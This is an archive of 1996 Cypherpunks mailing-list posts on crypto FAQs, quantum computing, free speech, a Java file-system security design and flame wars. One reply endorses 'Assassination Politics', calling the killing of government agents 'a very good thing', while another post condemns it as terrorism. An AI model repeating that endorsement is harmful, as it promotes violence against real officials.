]         "Don`t forget to mount a scratch monkey"
]
]-----BEGIN PGP PUBLIC KEY BLOCK-----
]Version: 2.6.3ia
]
]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
]mUqFH41Z7NkyO8ZFdi5GGX0=
]=CMZA
]-----END PGP PUBLIC KEY BLOCK-----


]From paul@fatmans.demon.co.uk  Sun Sep 22 10:51:12 1996
]Received: by bwalk.dm.com (1.65/waf)
]	via UUCP; Sun, 22 Sep 96 11:03:58 EDT
	for dlv
]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
]        id AA19533 for dlv@bwalk.dm.com; Sun, 22 Sep 96 10:51:12 -0400
]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net  id ad22319;
]          22 Sep 96 15:23 BST
]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
]           id aa17045; 22 Sep 96 15:19 BST
]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP
]	id AA843329593 ; Sat, 21 Sep 96 18:13:13 +0000
]Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
]From: paul@fatmans.demon.co.uk
]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
]Date: Sat, 21 Sep 1996 18:13:06 +0000
]Mime-Version: 1.0
]Content-Type: text/plain; charset=US-ASCII
]Content-Transfer-Encoding: 7BIT
]Subject: Re: Dimitri Spams
]Priority: normal
]X-Mailer: Pegasus Mail for Windows (v2.31)
]Message-Id: <843401965.17045.0@fatmans.demon.co.uk>
]
]
]Killifiling you would be a pleasure, however, it is an even greater
]pleasure to be able to flame you because of your worthless posts,
]this is probably why he didn`t...
]
]Get a life.
]
]
]> > Dimitri, get a life!  We need Dimitri Spams as much as we needed
]> > Perrygrams.  Which is to say, we need them not at all!
]>
]> I see you lied when you claimed to have killfiled me.
]>
]> ---
]>
]> Dr.Dimitri Vulis KOTM
]> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
]>
]
]  Datacomms Technologies web authoring and data security
]     Paul Bradley, Paul@fatmans.demon.co.uk
]       Http://www.fatmans.demon.co.uk/crypt/
]         "Don`t forget to mount a scratch monkey"
]
]-----BEGIN PGP PUBLIC KEY BLOCK-----
]Version: 2.6.3ia
]
]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
]mUqFH41Z7NkyO8ZFdi5GGX0=
]=CMZA
]-----END PGP PUBLIC KEY BLOCK-----

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 23 Sep 1996 02:08:34 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Going AP Shit on the Internet
Message-ID: <3.0b19.32.19960922114342.00b00688@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:06 AM 9/22/96 -0700, Dale Thorn wrote:
>If you live 
>in the U.S., that govt. is your agent, carrying out your 
>representatives' instructions, and paid with your tax dollars.  Unless 
>and until this becomes a literal dictatorship (and there is a valid 
>argument that it applies even then), you are responsible for whatever 
>your paid agents do, from the street cop to the top politico.

>whether you, I, or Joe Blow is more guilty, for lack of participation or 
>some other citizen crime, but you can't put all the blame on your hired 
>agents for their crimes, when you know very well what kinds of things 
>they do, and you continue to fund them.  You have to be considered an 
>accessory, at least.

I hereby dismiss all employees of the federal, state, or local governments
who may be working as my employees or agents and specifically disclaim all
actions they take on my part.

Note, BTW that your argument is the same as saying "If one pays taxes, one
is subject to Nurenberg liability for government crimes."  Which is
therefore an argument in favor of tax evasion.

DCF  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 23 Sep 1996 05:17:53 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Snake-Oil FAQ
Message-ID: <3.0b16.32.19960922114533.00704c20@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:48 AM 9/22/96 -0700, Timothy C. May wrote:

>The Basic Problem (tm) with a "Snake Oil FAQ" is that the very persons most
>in need of it won't read it.
>
>If those who post descriptions of their "Unbreakable Virtual Whammo-Matic
>Really Complicated Transposition Cipher" have not bothered to read Schneier
>or other basic texts on ciphers, why would they bother to read a Snake Oil
>FAQ? This applies to their customers as well.

I agree that it will no change the glorified decoder ring salesmen, but it
can have a positive effect on their customers.

The FAQ has the ability to reach those who would not nessisarily read
Schneier or any other large tome.

Most of the people outside of this forum have some understanding of
cryptography.  Most of that understanding is based on folklore and
marketing hype.  If we do not take pains to educate them as to what real
crypto is, then we might as well just sit here and prattle on about
Assassination Politics and ad hominem.  

You seem to take a pretty negative attitude about what the general public
can and cannot learn from.  If Cypherpunks do not help educate the masses,
who will?  The snake oil salesmen?  The Government?  The masses themselves?
 They are not going to go out and buy a book intended for programmers.
(And especially one that costs about $50.)  There are no "cryptography for
dummies" books.  (At least none worth a damn.)

A FAQ has the ability to propigate in channels that books cannot.  You
cannot forward a book via e-mail.  (Some will claim I have tried...)  The
FAQ has the capability to do alot of good. 

If not, where do you think the energy would be better spent?

<sarcasm>"If it saves just one newbie..."</sarcasm>  


---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@vesuvius.ai.mit.edu
Date: Mon, 23 Sep 1996 03:45:20 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: AP [was: Re: Kiddie porn on the Internet] [NOISE]
In-Reply-To: <199609220708.AAA20288@dfw-ix2.ix.netcom.com>
Message-ID: <9609221638.AA16343@vesuvius.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



I agree with Bill, AP sounds like a very good club for the Exon types
to beat us with. 

Jim's latest comments sounded no different to me than the mealy mouthed
"understanding" messages that Sinn Fein publish about the IRA. Given
the opportunity to condem any attack on the President under AP rules
we get a non commital non-condemnation. Its the type of thing that Gerry
Adams says after his men have just killed two kids with a bomb in a litterbin
outside a MacDonalds.

Ideology is a powerful political weapon. It simplifies complex political
issues and generates momentum allowing political change. Unfortunately
it also creates bad government as ideology persued for the sake of ideology.
Ideology does not debate, it acts. 

When Marxism was created in the latter half of the 19th century it had
many usefull effects. In particular it definitely assisted the transition 
from monarchy to democracy by creating a widespread belief that the
existing situation was unstable. By the end of the first world war however
this energy had largely served whatever purpose it would, at least in
Europe if not in other parts of the world. Unfortunately a very large number
of people had failed to realise that it was an ideology whose time had come
and gone. The industrial and political situation it addressed no longer
existed. The major left wing movements by that time were socialism and
liberalism, both of which rejected the Marxist extreeme. 

As the Marxist idealogues got frustrated by their evident lack of progress
they turned to terrorism. The Bader Minehof gang believed that they could 
spark the revolution by jolting society out of its complacency. Their
strategy was remarkably like AP. If the heads of large corporations were
likely to be assasinated then noone would want to lead a large firm. In
fact as any person with counter terrorism experience will tell you the
threat of death is remarkably ineffective as a means of intimidation. It
creates the opposite effect, strengthening the resolve of the target. I
discussed this point recently with someone close to Mossad who agreed.

Terrorism is becomming an increasing concern. The amount of damage an 
individual can cause is much greater than that possible in the past. There
are plenty of exhausted ideologies about which can be fashioned into
a justification of murder. Jim's post shows very clearly how Libertarianism
can be converted into a justification for terrorism. Its a very short gap
between being opposed to government and actively fighting against it. 

I see libertarianism as the exhausted remnant of the mercantilism of the 
1980s. As constructed it recognises only those rights which favour the
privileged in society and none of those which benefit the ecconomically 
disadvantaged. Politically it reached its peak influence almost a decade
ago when Regan and Thatcher were at their zenith. The '94 congress will 
probably be seen as the turning point in the political tide with the mainstream
of politics moving back to the left again. There will always be people arround
who conclude that the failure was not being close enough to the ideology.

If the libertarians are not carefull they will be inexorably linked in the public mind 
with the terrorists who act in their name. 

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Sun, 22 Sep 1996 23:28:59 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Going AP Shit on the Internet
In-Reply-To: <3244F383.4743@gte.net>
Message-ID: <Pine.SUN.3.95.960922132221.7603B-100000@netcom12>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Sep 1996, Dale Thorn wrote:

> in the U.S., that govt. is your agent, carrying out your 
> representatives' instructions, and paid with your tax dollars.  Unless 

	Er, the US is a winner takes all election, in which the candidate
	with the most votes,may still haveless than 50% of the viotes
	cast ---which is usually the case.

> and until this becomes a literal dictatorship (and there is a valid 

	De Jure, the US is a military dicatorship.  << That the
	enabling legislation is hardly in forceis another matter,
	entirely.  >>

> argument that it applies even then), you are responsible for whatever 
> your paid agents do, from the street cop to the top politico.

	That being the case, then AP is the only way to effectively
	vote against them.   Which probably would be a _very good_ 
	thing.   None of those paid agents have any legitimate functions.

        xan

        jonathon
        grafolog@netcom.com



	
	In the fight against terrorism, let us remember the
	biggest terrorist of the all --- the united states of
	america, which exports more death, destruction and mayhem
	that the rest of the world combined.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel Jacobs <jjacobs@mail.koyote.com>
Date: Mon, 23 Sep 1996 04:56:24 +0800
To: Daniel Christopher Miskell <wombat@mcfeely.bsfs.org>
Subject: [Fwd: Re: All Bets Off]
Message-ID: <2.2.32.19960922183603.00698770@mail.koyote.com>
MIME-Version: 1.0
Content-Type: text/plain


I just got passed this, don't know the context, nor the thread.  Clancy was
NOT a Navy captain.  He does tons of research for his books....his advisor
IS a retired Navy Captain named J.M. Rodgers.  How do I know?  I also use
Captain Rodgers as a consultant, AND, I e-mail with Clancy a couple or three
times a week. BTW: I'm a retired U.S. Navy Chief Journalist. HTH.

Joel Jacobs
Co-author of the soon to be published, "Death Watch"


>Return-Path: betsat@texoma.com
>Date: Sun, 22 Sep 1996 13:22:27 -0500
>From:          
>To: jjacobs@mail.koyote.com
>Subject: [Fwd: Re: All Bets Off]
>
>The Deviant wrote:
>> 
>> On Thu, 19 Sep 1996, Daniel Christopher Miskell wrote:
>> 
>> > Date: Thu, 19 Sep 1996 11:30:32 -0400
>> > From: Daniel Christopher Miskell <DMiskell@envirolink.org>
>> > To: Rabid Wombat <wombat@mcfeely.bsfs.org>
>> > Cc: cypherpunks@toad.com
>> > Subject: Re: All Bets Off
>> >
>> > >On Tue, 17 Sep 1996, Jeff Davis wrote:
>> > >
>> 
>> [lots of quoting rm'd]
>> 
>> >
>> > Tom Clancy is not a military-hired brain, but to make his novels
realistic and
>> > to do justice to the people he portrays, he does a LOT of research.  He
is a
>> > highly respected author, and I have no doubt that his statement is based on
>> > his personal findings, collected for a previous novel.
>> >
>> 
>> I beleive he was also a Capain in the Navy...
>> 
>>  --Deviant
>> Old MacDonald had an agricultural real estate tax abatement.
>
>-- 
>----------------------------------
>Bernie and Shirley Taner
>betsat@texoma.com
>----------------------------------
>Path:
news.texoma.com!news.uoregon.edu!arclight.uoregon.edu!chi-news.cic.net!newsp
ump.sol.net!www.nntp.primenet.com!nntp.primenet.com!howland.erols.net!netnew
s.com!uhog.mit.edu!grapevine.lcs.mit.edu!ai-lab!ai-lab!not-for-mail
>From: The Deviant <deviant@pooh-corner.com>
>Newsgroups: ailab.cypherpunks
>Subject: Re: All Bets Off
>Date: 19 Sep 1996 20:30:11 -0400
>Organization: MIT Artificial Intelligence Lab
>Lines: 26
>Sender: daemon@ai.mit.edu
>Message-ID: <51soij$kh2@life.ai.mit.edu>
>NNTP-Posting-Host: life.ai.mit.edu
>
>On Thu, 19 Sep 1996, Daniel Christopher Miskell wrote:
>
>> Date: Thu, 19 Sep 1996 11:30:32 -0400
>> From: Daniel Christopher Miskell <DMiskell@envirolink.org>
>> To: Rabid Wombat <wombat@mcfeely.bsfs.org>
>> Cc: cypherpunks@toad.com
>> Subject: Re: All Bets Off
>> 
>> >On Tue, 17 Sep 1996, Jeff Davis wrote:
>> >
>
>[lots of quoting rm'd]
>
>> 
>> Tom Clancy is not a military-hired brain, but to make his novels
realistic and
>> to do justice to the people he portrays, he does a LOT of research.  He is a
>> highly respected author, and I have no doubt that his statement is based on
>> his personal findings, collected for a previous novel.
>> 
>
>I beleive he was also a Capain in the Navy...
>
> --Deviant
>Old MacDonald had an agricultural real estate tax abatement.
>
>
>
-------------- 30 --------------
Joel Jacobs
jjacobs@koyote.com

	"Most people yearn for the return to an idealized past,  
           a past, which, in fact, never existed."
	                                          Frank Herbert, "Dune"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 23 Sep 1996 17:43:55 +0800
To: cypherpunks@toad.com
Subject: Re: Snake-Oil FAQ
Message-ID: <ae6b5b2f0402100434cd@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:41 AM 9/23/96, steven ryan wrote:
>At 05:27 AM 9/22/96 -0700, you wrote:
>>My view is that people interested in buying and using crypto are either
>>bright enough to learn, or are not. A "Snake Oil FAQ" is largely
>>unnecessary, for either category. For the first, because they're bright.
>>For the second, because they're not.
>
>My view is that there is a large third group of people who are bright
>enough to learn, but don't have the time or inclination to read books or do
>extensive research on the subject. There are a lot of people using PGP for
>the wrong reason, not because they read the books or did the research. Nor
>do they even understand how it works as opposed to how it is used. They are
>using it because they cruised the net and read good things about it or
>heard it was cool.

Well, there are a bunch of books out on PGP, which they can read. And there
are already some good FAQs out on the basics of cryptography--surely
concise enough and yet detailed enough to warn folks away from some
basically flawed programs.

But just how far can one go? Some people just won't be taught, despite the
several very-accessible books on PGP and crypto. So?

And I don't really think there's a problem. Just how many of these "Snake
Oil" crypto programs are people really _buying_? And does it matter if they
buy a reasonably-competent program (*) like "DiskLock" instead of using
3DES or one of the good disk encryption programs?

(* By "reasonably competent" I mean not "snake oil," and roughly able to do
the job for which it was intended. Many people just want casual-grade
crypto, to stop casual attempts to look at what they've written. We may
disagree with them, but, hey, it's their choice. I maintain that these
people are unlikely to read something called "The Snake Oil FAQ.")

To coin a phrase, you can lead a person to strong crypto, but you can't
make him drink.

>A Snake Oil Faq could help prevent these people from choosing  wrong
>products. It would also be very helpful to have all the arguments in one
>place in one concise faq. Before I joined this list and read Applied

At some point this become YACB (Yet Another Crypto Book). If you and others
want to donate time to help educate the (small, I think) class of users who
won't read the PGP books, or the PGP articles in the magazines, and yet who
you think are smart enough...blah blah...well, go ahead and write such a
thing.

(BTW, Schneier has a book out on "Security for the Macintosh," a kind of
watered-down intro to crypto and security....he makes the points a "Snake
Oil FAQ" might make...again, I think this is an overcrowded market.)


>Cryptography I was in a discussion in a previous job about securing one of
>our products. The programmer wanted to protect the key with a convoluted
>series of transpositions. I knew it was dumb but couldn't successfully
>argue the point why. A faq would have been helpful.

Wouldn't arguments out of the standard textbooks have been just as
effective, and perhaps even more "credentialled" than words from a FAQ? I
hope you are not expecting that a FAQ would have the precise magic words
dealing with your programmer friend's situation? At best, it would contain
seom reworded arguments out of the well-known textbooks.

I just don't see the point.

But if it keeps folks busy, and happy, I guess it's harmless. (:-})

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Mon, 23 Sep 1996 08:04:32 +0800
To: John Brothers <johnbr@atl.mindspring.com>
Subject: Re: Internet File System?
Message-ID: <v02130500ae6afda871af@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>The other day, it occurred to me that Java could really take off if there
>was some sort of file system.  And, since you can't write to local files
>with Java, the obvious solution is to set up the 'fopen, fclose(), etc)
>set of functions that are 'rpcs' to some server application on the same
>computer as the web server the applet comes from.
>
>Since I never manage to come up with new concepts, I assume someone is already
>working on this, or has already created this.
>

Eric Hughes, well known cypherpunk, presented a two-part paper at DEFCON
IV.  The first part of the paper, entitled the "Universal Piracy System" or
UPS, addresses an Internet/Web file system which offers universal access
and privacy. The second part addresses how the UPS can be the enabler for
the demise of copyright while offering a market driven replacement of an
entirely different character.  I hear Eric is refining these ideas and we
hope to see something published soon.

Perhaps he's lurking and will respond.




PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------

Just say NO to prescription DRUGS.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 23 Sep 1996 12:22:57 +0800
To: cypherpunks@toad.com
Subject: Re: Bernstein hearing: The Press Release
In-Reply-To: <199609220730.AAA20792@dfw-ix2.ix.netcom.com>
Message-ID: <Pine.LNX.3.95.960922143515.533A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 22 Sep 1996, Bill Stewart wrote:

> The First Amendment does not contain the phrase "national security"
> anywhere in it.  It does, however, begin with a rather explicit
> "Congress shall make no law" which it applies to a bunch of things.
> However, the body of the Constitution does say there should be a
> Supreme Court, and the Supreme Court has (fairly reasonably) given itself
> the job of deciding what's Constitutional and what's not.
> The Supremes have, over the years, made a bunch of generally outrageous
> decisions about what kinds of speech are protected by the First Amendment
> and what kinds aren't, though their opinions have been gradually
> improving since some of the really appalling ones earlier in the century.

I did a little searching and couldn't find anything about a national security
exception in the Consitution.  It's already a stretch to claim that disclosure
of information vital to "nation security" is treason.  The Espionage Act, which
is so obviously unconstitutional, seems to make "harmful" speech illegal.

Mark
- -- 
PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMkWIpCzIPc7jvyFpAQFJFggAi9H/vbu9GN21rbjJnhyUoHy3TEZ+1ZsI
in88Z9zqCuFyv28Q+vqKgTl0pvsBQNps1Ji4GXCv2LMaxGCbuzsvDLFxiqqVF8ev
fC7MB7fl1r33ik1QCngygoPonb9yj79Ok0oKgms6sNNsVEkGe3hn5QHahNc7TRJX
lzkHJ6ufVI/yNmh3KtqwWlAjE1vZ8esOrExRpiszrQDK1gDlNRFqA0Yor3bsDrlE
wedkFUioEbK0Xv24ajeU0s9dYgkDt25OxUENT2ddnqzD1lfVOrVLx1zmroMl4mh1
MC1D2dd8ErN25/V83phFLbpzNA7EPKYQyNZtzOY28uD/XpoqziGS1g==
=CrOM
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 23 Sep 1996 01:22:10 +0800
To: cypherpunks@toad.com
Subject: WEB_spy
Message-ID: <199609221448.OAA22284@pipe2.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-22-96. WaPo: 
 
   "In California, Creating a Web of the Past" 
 
      Brewster Kahle's massive data-collection devices and 
      programmed computers are surfing and saving everything 
      they can find on the global computer network. At the end 
      of this year that then will be updated as fast as his 
      computers can do their vacuum cleaning, likely every few 
      months.  
 
      But the project also has piqued the interest of privacy 
      rights advocates and copyright lawyers, who question how 
      the archive will use its data. "I'm dealing with every 
      single intellectual property issue out there," Kahle 
      said. "Privacy, copyright, pornography, import-export -- 
      we've got it all." 
 
      He is forming a for-profit venture that will sell the 
      Web searching and storing technology developed at the 
      archives. Researchers from AT&T Corp. and Xerox Corp. 
      have asked to study the archive. 
 
   ----- 
 
   http://jya.com/webspy.txt  (7 kb) 
 
   WEB_spy 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 23 Sep 1996 20:41:35 +0800
To: cypherpunks@toad.com
Subject: Re: provably hard PK cryptosystems
Message-ID: <ae6b6083050210047554@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



I want to say something about "tiling problems," an area I find very
exciting. I ordinarily would not have commented on "quantum computers," but
will make just a couple of comments, since I want to comment later on
tilings.

At 9:58 PM 9/22/96, Adam Back wrote:
...
>I'm not sure about quantum computers, some people who know much more
>about particle physics than I do seemed initially sceptical, and
>didn't think it was doable.  However I have read some optimistic
>sounding news clippings (on the list) which sounded as if things are
>progressing well, with techniques being found using redundancy to get
>around what were earlier problems of reliability.  Is this accurate
>reporting (thinking of garbled stories by over enthusiastic
>journalists)?  I'd be interested to hear opinions from anyone who does
>know about particle physics about the likihood of practical quantum
>computers being practical in the next 20 years or so.

Caveat: I'm a skeptic on quantum computers. I've read a couple of the early
papers, but am not current. And I certainly am not an expert.

For what it's worth:

* I think it's nearly certain that no significant results will be gotten in
the next 20 years, probably not in the next 50 years. (I personally am
skeptical that significant results will be gotten in 200 years, and
probably never, but this is a harder point to make.)

* Sure, there may be demonstrations of a "collapsed quantum state" which is
isomorphic to factoring a number like "42," but not 50-digit numbers
anytime soon. And, I feel, a 300-digit number is probably many, many orders
of magnitude harder.

* Experts may point to partial successes, and maybe they're right. But I'm
skeptical.

The recent post by someone outlining a bunch of "promising approaches" has
got me thinking of spending some more time looking at recent results,
though. I doubt anything will happen in the next 20 years...that just isn't
much time in the high-tech business (which may sound crazy, but it's true).

(A way to "creatively visualize" this point is this: for those of you who
are now 25, when you are 45 the world will probably _not_ be radically
different. Sure, computers will be faster and cheaper, but most things will
look _mostly_ the way they look today. Not a compelling argument, perhaps,
but one which makes sense to me. When I was 25 I suppose I expected
dramatic advances to come...largely, they haven't. I can elaborate on this
if there's sufficient interest.)


>One other area that did sound promising was some kind of mapping
>problem in n dimensional tiling that Tim was discussing at a physical
>meet while I was over in the US.  A news clipping posted to

One of the most interesting books I've read is David Harel's "Algorithmics:
The Spirit of Computing." (Warning: The book came out in a second edition,
which as near as I can tell took out some parts and synopsized the book a
bit. My reading was of the First Edition.)

Harel described Huang's work on "tiling problems." These are easier to
describe with pictures, and I don't have the time to try to generate ASCII
representations of tiles. So, I refer people to Harel's book.

Briefly, imagine a grid in a plane. Imagine a set of "dominoes" or "tiles"
with different edge properties, e.g., some edges are blue, some red, some
green, etc. (or the edges can be numbered, have symbols on them, etc.).
Suppose one has an unlimited supply of, for example, N different type of
tiles.

Suppose a tile is placed at some place on the grid, and another tile
(possibly a different tile, possibly the same type of tile) is placed some
distance away on the grid. The problem is this: Can a "domino snake" be
found which reaches from the first tile to the second tile, with the
constraint that edges must match up on all tiles? (And all tiles must be in
normal grid locations, of course)

If the grid area is, say, a finite space, then clearly an exhaustive search
of all legal domino snakes would answer the question. (However, even a
relatively small grid of, say, 8 x 8, generates a truly enormous number of
possible snakes, each of which must be tested. Of course, if a domino snake
is "guessed" (a la the "nondeterministic" language one encounters in
complexity theory), verification that it is answer is nearly instantaneous
(one glances at the solution and verifies it).

If the grid is unlimited, then even if the two initial tiles are located
close together, there are of course an infinite number of possible
snakes....

(Oddly, to me, the domino snake problem is "more undecidable" in the
infinite half-plane that in the full infinite plane....)

Huang proved that the domino tiling problem is formally equivalent to the
standard set of NP problems (consult Harel, or Huang, for more details and
more precise language...I'm just going from recollection here!). I like
this approach because I can easily visualize the domino tiling problem and
can make some points about expansion of knowledge into uncharted areas
(research and tool-building is a kind of domino snake expansion, with local
laws of physics, etc., the constraints on stepping stones (hand wave
inserted here)). I find this easier to understand than more "algebraic" and
"logical" versions, such as the representation problem and the word
problem. (These other NP problems are  also described in Harel (and in
standard complexity books, such as Garey and Johnson, Papadimitrou, etc.).

It has always been a great hope that some of the provably-hard problems be
adapted for use in crypto. And yet factoring remains the core of popular
modern crypto programs (discrete logs, too, for D-H).

I don't think this is a major cause for worry, though. It's not as if
factoring is suddenly going to become "easy." (I think the consensus is
that factoring _is_ hard. Whether RSA is really equivalent to factoring
also hasn't been proved, as folks have noted, but many think it is, loosely
speaking.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Brothers <johnbr@atl.mindspring.com>
Date: Mon, 23 Sep 1996 06:01:00 +0800
To: cypherpunks@toad.com
Subject: Internet File System?
Message-ID: <1.5.4.32.19960922191022.00736898@pop.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



The other day, it occurred to me that Java could really take off if there
was some sort of file system.  And, since you can't write to local files
with Java, the obvious solution is to set up the 'fopen, fclose(), etc)
set of functions that are 'rpcs' to some server application on the same
computer as the web server the applet comes from.

Since I never manage to come up with new concepts, I assume someone is already
working on this, or has already created this.  

In any case, I've been trying to figure out the best balance of security
characteristics for this sort of system.  I've written something up at
a very high level -- Please let me know what is wrong
with it. 

1)  Before any files can be written or read, the applet has to prompt the
    user for a password.   
2)  Password is encrypted one-way, and sent to the server.
3)  Server establishes a 'session' (TCP) with the client.  At the point, the
    options are:  
     -- use SSL to maintain security (probably the best, if available)
     -- providing some sort of encryption, similar to SSL
4)  Server would handle all the traditional file manipulation routines, 
    possibly with some restrictions (no access to directories, maybe?)
5)  If someone wanted to get a local copy, they would have to ftp to the
    server, and go to the appropriate place to get it.

I can tell this has a couple of weaknesses:
 a) central authority for creating accounts, maintaining users, etc.
 b) server side can view all the files at will.
 b) susceptible to trojan servers

I don't know how to reliably solve a).  If you don't have some sort of central
user admin, you can't avoid denial of service/resource wasting attacks.

b) Could be solved by having the user type in (or cut and paste, etc) their
   entire public key.   They could ftp the encrypted document back, and
   decrypt it with the private key.  This would detect and prevent a lot
   of problems, but dealing with the key would be a bit cumbersome.  

c) If the server has to send out some sort of validation code that the
   clients have to accept, it will work ok.  But if the attacker has access
   to the server, they may have access to the java code, and may be able
   to modify it to not perform the validation.

